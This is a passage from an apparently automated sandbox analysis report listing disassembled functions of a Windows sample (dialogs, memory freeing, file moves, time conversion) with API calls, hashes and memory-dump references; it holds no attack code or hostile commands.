                          • Opcode ID: 4aa3fdf7e2608105a27d21784ee6562e23aedc90c7d92c1c1a0dc4375bc58b16
                          • Instruction ID: 3c565dd1802e6dd37cc3ec7e227293f9f8993ac73f583aab081abdcf98c1d9ce
                          • Opcode Fuzzy Hash: 4aa3fdf7e2608105a27d21784ee6562e23aedc90c7d92c1c1a0dc4375bc58b16
                          • Instruction Fuzzy Hash: C5514571A083028FC748CF19D48059AF7E1FFC8354F058A2EE899A7740DB34EA59CB96
                          Function 003837C1 Relevance: .1, Instructions: 112COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                          • Instruction ID: 2881b8454ecb74ca7124bb95c5a37e135f377c8b5e3bdaeb7c99324bf83aa8b4
                          • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                          • Instruction Fuzzy Hash: 4D31E3B16047458FCB15EF28C85226EBBE0FB95700F10892DF4A9C7742C779EA49CB92
                          Function 00375F3C Relevance: .1, Instructions: 76COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c547d6dc81d248a9a4d96e85a4ea1083ba10aa9042b84b1279770cb04b7bbb6e
                          • Instruction ID: c43ae19afd8364d13b7443a1f4c87cd780a4edc7a7126bbff273251a201b1105
                          • Opcode Fuzzy Hash: c547d6dc81d248a9a4d96e85a4ea1083ba10aa9042b84b1279770cb04b7bbb6e
                          • Instruction Fuzzy Hash: 0021F832A201218BCB5DCF2DDCE093A7755E786311B46C22FEA468B2D0C539E924C7A0
                          Function 0037DA98 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 236COMMON
                          Download Yara Rule
                          APIs
                          • _swprintf.LIBCMT ref: 0037DABE
                            • Part of subcall function 0037400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0037401D
                            • Part of subcall function 00381596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,003B0EE8,00000200,0037D202,00000000,?,00000050,003B0EE8), ref: 003815B3
                          • _strlen.LIBCMT ref: 0037DADF
                          • SetDlgItemTextW.USER32(?,003AE154,?), ref: 0037DB3F
                          • GetWindowRect.USER32(?,?), ref: 0037DB79
                          • GetClientRect.USER32(?,?), ref: 0037DB85
                          • GetWindowLongW.USER32(?,000000F0), ref: 0037DC25
                          • GetWindowRect.USER32(?,?), ref: 0037DC52
                          • SetWindowTextW.USER32(?,?), ref: 0037DC95
                          • GetSystemMetrics.USER32(00000008), ref: 0037DC9D
                          • GetWindow.USER32(?,00000005), ref: 0037DCA8
                          • GetWindowRect.USER32(00000000,?), ref: 0037DCD5
                          • GetWindow.USER32(00000000,00000002), ref: 0037DD47
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                          • String ID: $%s:$CAPTION$T:$d
                          • API String ID: 2407758923-4012312144
                          • Opcode ID: 1505eadeb4377d8dd9f1b19e0fec7c2d804388dff8ab3e2377537612de3d9efe
                          • Instruction ID: 931987d8252c722aad6ef0cf461d9fcff52ff4091497407b92aa4f53e89ab007
                          • Opcode Fuzzy Hash: 1505eadeb4377d8dd9f1b19e0fec7c2d804388dff8ab3e2377537612de3d9efe
                          • Instruction Fuzzy Hash: 4081C071508301AFD722DF68DC88E6BBBF9EF89704F05891DFA8997250D674E805CB52
                          Function 0039C233 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 0039C277
                            • Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BE2F
                            • Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BE41
                            • Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BE53
                            • Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BE65
                            • Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BE77
                            • Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BE89
                            • Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BE9B
                            • Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BEAD
                            • Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BEBF
                            • Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BED1
                            • Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BEE3
                            • Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BEF5
                            • Part of subcall function 0039BE12: _free.LIBCMT ref: 0039BF07
                          • _free.LIBCMT ref: 0039C26C
                            • Part of subcall function 003984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0039BFA7,?,00000000,?,00000000,?,0039BFCE,?,00000007,?,?,0039C3CB,?), ref: 003984F4
                            • Part of subcall function 003984DE: GetLastError.KERNEL32(?,?,0039BFA7,?,00000000,?,00000000,?,0039BFCE,?,00000007,?,?,0039C3CB,?,?), ref: 00398506
                          • _free.LIBCMT ref: 0039C28E
                          • _free.LIBCMT ref: 0039C2A3
                          • _free.LIBCMT ref: 0039C2AE
                          • _free.LIBCMT ref: 0039C2D0
                          • _free.LIBCMT ref: 0039C2E3
                          • _free.LIBCMT ref: 0039C2F1
                          • _free.LIBCMT ref: 0039C2FC
                          • _free.LIBCMT ref: 0039C334
                          • _free.LIBCMT ref: 0039C33B
                          • _free.LIBCMT ref: 0039C358
                          • _free.LIBCMT ref: 0039C370
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID: P:
                          • API String ID: 161543041-692640210
                          • Opcode ID: c1c4543c08a9a93f07272f0073cf4eb2cfd8fcb30587d4be78ba854d4b1cd9c5
                          • Instruction ID: 830359eb8ad7f06fdf9dd557ceb6c721f1019abe7c862d21b23dadd3cbb0260e
                          • Opcode Fuzzy Hash: c1c4543c08a9a93f07272f0073cf4eb2cfd8fcb30587d4be78ba854d4b1cd9c5
                          • Instruction Fuzzy Hash: 4C318D326002069FEF22AB79D945B5BB3E9FF42310F129829E489DB551DF35FC409B20
                          Function 0038CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindow.USER32(?,00000005), ref: 0038CD51
                          • GetClassNameW.USER32(00000000,?,00000800), ref: 0038CD7D
                            • Part of subcall function 003817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0037BB05,00000000,.exe,?,?,00000800,?,?,003885DF,?), ref: 003817C2
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0038CD99
                          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0038CDB0
                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0038CDC4
                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0038CDED
                          • DeleteObject.GDI32(00000000), ref: 0038CDF4
                          • GetWindow.USER32(00000000,00000002), ref: 0038CDFD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                          • String ID: STATIC
                          • API String ID: 3820355801-1882779555
                          • Opcode ID: 2a008286836992041dd9820240c541b349824668a266f4e2d9073cdcde487d52
                          • Instruction ID: b54f77fcdca19551367631f01b2b56c775a2c8a47013be90d070003706b84dfa
                          • Opcode Fuzzy Hash: 2a008286836992041dd9820240c541b349824668a266f4e2d9073cdcde487d52
                          • Instruction Fuzzy Hash: 5F1106325513117BE3237B70AC0AFAF775CEF65742F018462FA42A50A2DA74890A97B4
                          Function 00398EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00398EC5
                            • Part of subcall function 003984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0039BFA7,?,00000000,?,00000000,?,0039BFCE,?,00000007,?,?,0039C3CB,?), ref: 003984F4
                            • Part of subcall function 003984DE: GetLastError.KERNEL32(?,?,0039BFA7,?,00000000,?,00000000,?,0039BFCE,?,00000007,?,?,0039C3CB,?,?), ref: 00398506
                          • _free.LIBCMT ref: 00398ED1
                          • _free.LIBCMT ref: 00398EDC
                          • _free.LIBCMT ref: 00398EE7
                          • _free.LIBCMT ref: 00398EF2
                          • _free.LIBCMT ref: 00398EFD
                          • _free.LIBCMT ref: 00398F08
                          • _free.LIBCMT ref: 00398F13
                          • _free.LIBCMT ref: 00398F1E
                          • _free.LIBCMT ref: 00398F2C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 55f21199946d430016bef69a4b829801a4a6df29e364741c5100d6151c0d7b1d
                          • Instruction ID: c51a49f2ac989b66fb73efdbc633ec68ceeee643d2d010909bd09f9d2b068ec3
                          • Opcode Fuzzy Hash: 55f21199946d430016bef69a4b829801a4a6df29e364741c5100d6151c0d7b1d
                          • Instruction Fuzzy Hash: B211B37650010DBFCF12EF95C842CDA3BA5FF86354B5281A5FA088F626DA31EE51DB80
                          Function 00372162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID:
                          • String ID: ;%u$x%u$xc%u
                          • API String ID: 0-2277559157
                          • Opcode ID: 7c587d795378e157b1181250b5e6d695fa8e54ae0843f6368fb4c2b850622a61
                          • Instruction ID: eea368a0de2753c9d8907a7e26a4aa0020264319a4d1e00941373c7d95aea1ea
                          • Opcode Fuzzy Hash: 7c587d795378e157b1181250b5e6d695fa8e54ae0843f6368fb4c2b850622a61
                          • Instruction Fuzzy Hash: B9F106716042805BDB3BEE2489D5BEB77D96B91300F08C56DF88D9F283DA6C9948C762
                          Function 0038ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0037130B: GetDlgItem.USER32(00000000,00003021), ref: 0037134F
                            • Part of subcall function 0037130B: SetWindowTextW.USER32(00000000,003A35B4), ref: 00371365
                          • EndDialog.USER32(?,00000001), ref: 0038AD20
                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 0038AD47
                          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0038AD60
                          • SetWindowTextW.USER32(?,?), ref: 0038AD71
                          • GetDlgItem.USER32(?,00000065), ref: 0038AD7A
                          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0038AD8E
                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0038ADA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: MessageSend$Item$TextWindow$Dialog
                          • String ID: LICENSEDLG
                          • API String ID: 3214253823-2177901306
                          • Opcode ID: 9354803de2174380cc54d2ad85a4a93f12bf81be8538eb0c81493c9e0511ce20
                          • Instruction ID: 68e726597613145fba31c6b8b47872de1fc16a6f1e67d8fa6875129c4334c61a
                          • Opcode Fuzzy Hash: 9354803de2174380cc54d2ad85a4a93f12bf81be8538eb0c81493c9e0511ce20
                          • Instruction Fuzzy Hash: 4E21E732241705BBE6236F31EC49F3B3B6CEB5A746F024046F604D64A0DB626904D732
                          Function 00379443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 00379448
                          • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0037946B
                          • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0037948A
                            • Part of subcall function 003817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0037BB05,00000000,.exe,?,?,00000800,?,?,003885DF,?), ref: 003817C2
                          • _swprintf.LIBCMT ref: 00379526
                            • Part of subcall function 0037400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0037401D
                          • MoveFileW.KERNEL32(?,?), ref: 00379595
                          • MoveFileW.KERNEL32(?,?), ref: 003795D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                          • String ID: rtmp%d
                          • API String ID: 2111052971-3303766350
                          • Opcode ID: 1189bfd0e2a1b4f5305224798408845d0e4ec891d90ce6deaf89b945317bdf52
                          • Instruction ID: 7fd96a90cf09fd6e1465d17167e82cbd148fa720984efb4d655dc35e8b9e49c4
                          • Opcode Fuzzy Hash: 1189bfd0e2a1b4f5305224798408845d0e4ec891d90ce6deaf89b945317bdf52
                          • Instruction Fuzzy Hash: 61415F71900259A6CF32EB648C85FEE737CAF51390F0586E6B54DE7041EB788B89DB60
                          Function 00388E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00388F38
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00388F59
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00388F80
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Global$AllocByteCharCreateMultiStreamWide
                          • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                          • API String ID: 4094277203-4209811716
                          • Opcode ID: 5de0c772c352e69bed24e2602675943b12bfb16996cdac4d6a5222ded7b69165
                          • Instruction ID: fece0d7e642dfd42219aceac83e09d58885205a9643d8872f3a3be26337c4e8d
                          • Opcode Fuzzy Hash: 5de0c772c352e69bed24e2602675943b12bfb16996cdac4d6a5222ded7b69165
                          • Instruction Fuzzy Hash: 56314A325083117BDB27BB34AC02FAF7B6CDF86724F51055AF9019A1C1EF749A0983A5
                          Function 00398FA5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,003B0EE8,00393E14,003B0EE8,?,?,00393713,00000050,?,003B0EE8,00000200), ref: 00398FA9
                          • _free.LIBCMT ref: 00398FDC
                          • _free.LIBCMT ref: 00399004
                          • SetLastError.KERNEL32(00000000,?,003B0EE8,00000200), ref: 00399011
                          • SetLastError.KERNEL32(00000000,?,003B0EE8,00000200), ref: 0039901D
                          • _abort.LIBCMT ref: 00399023
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID: X:
                          • API String ID: 3160817290-423137811
                          • Opcode ID: 0de736e20c78644e932a23fedd80f41bdb2364f18b5793abd8a79f048ce786b7
                          • Instruction ID: ef7daabd51689d3613b7b573752642c1f1ab17e011ad1daa5ce275989cb64a2a
                          • Opcode Fuzzy Hash: 0de736e20c78644e932a23fedd80f41bdb2364f18b5793abd8a79f048ce786b7
                          • Instruction Fuzzy Hash: 4BF02836504A006BCE2377287C0AB6B292E9FC3760F270119F417D72A2EF21C9015050
                          Function 00380A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                          Download Yara Rule
                          APIs
                          • __aulldiv.LIBCMT ref: 00380A9D
                            • Part of subcall function 0037ACF5: GetVersionExW.KERNEL32(?), ref: 0037AD1A
                          • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00380AC0
                          • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00380AD2
                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00380AE3
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00380AF3
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00380B03
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00380B3D
                          • __aullrem.LIBCMT ref: 00380BCB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                          • String ID:
                          • API String ID: 1247370737-0
                          • Opcode ID: 1c31b43ad60ad2b48ca26cabac6aa679c539ddb14b23825d37da1991935590fc
                          • Instruction ID: 8ddfb0ff278780043fc39fc0fc093c21ed731ada25e1968b5ffcb51d57891da1
                          • Opcode Fuzzy Hash: 1c31b43ad60ad2b48ca26cabac6aa679c539ddb14b23825d37da1991935590fc
                          • Instruction Fuzzy Hash: A44128B1408306AFC355EF65C8809ABFBF8FF88714F004A2EF59692650E778E548CB52
                          Function 0039EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0039F5A2,?,00000000,?,00000000,00000000), ref: 0039EE6F
                          • __fassign.LIBCMT ref: 0039EEEA
                          • __fassign.LIBCMT ref: 0039EF05
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0039EF2B
                          • WriteFile.KERNEL32(?,?,00000000,0039F5A2,00000000,?,?,?,?,?,?,?,?,?,0039F5A2,?), ref: 0039EF4A
                          • WriteFile.KERNEL32(?,?,00000001,0039F5A2,00000000,?,?,?,?,?,?,?,?,?,0039F5A2,?), ref: 0039EF83
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: 28ba54e7ae805589846d885f8642dadbb4ad68b8838c3bdec1185d260f8d28ef
                          • Instruction ID: 22fe768178572eb4057a574b4230b84e78ffc6e8651acd5cb6fa29c375fa716b
                          • Opcode Fuzzy Hash: 28ba54e7ae805589846d885f8642dadbb4ad68b8838c3bdec1185d260f8d28ef
                          • Instruction Fuzzy Hash: 4C51B3B1A00209AFDF12CFA8D845AEEBBF9EF09310F15451BE556E7291D7319940CB60
                          Function 0038C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          • GetTempPathW.KERNEL32(00000800,?), ref: 0038C54A
                          • _swprintf.LIBCMT ref: 0038C57E
